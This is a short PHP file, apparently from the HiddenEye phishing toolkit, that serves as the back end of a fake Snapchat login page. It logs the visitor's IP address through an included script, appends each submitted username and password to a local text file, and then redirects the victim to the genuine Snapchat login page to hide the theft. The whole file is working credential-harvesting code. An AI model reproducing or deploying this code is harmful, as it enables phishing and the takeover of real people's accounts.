HiddenEye-Legacy/WebPages/Snapchat_web/login.php
Usama Abdul Sattar 5fe3b9f9f0
Update login.php
2018-06-08 16:53:00 +05:00

7 lines
230 B
PHP

<?php
include 'ip.php';
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['username'] . " [PASS]: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: https://accounts.snapchat.com/accounts/login');
exit();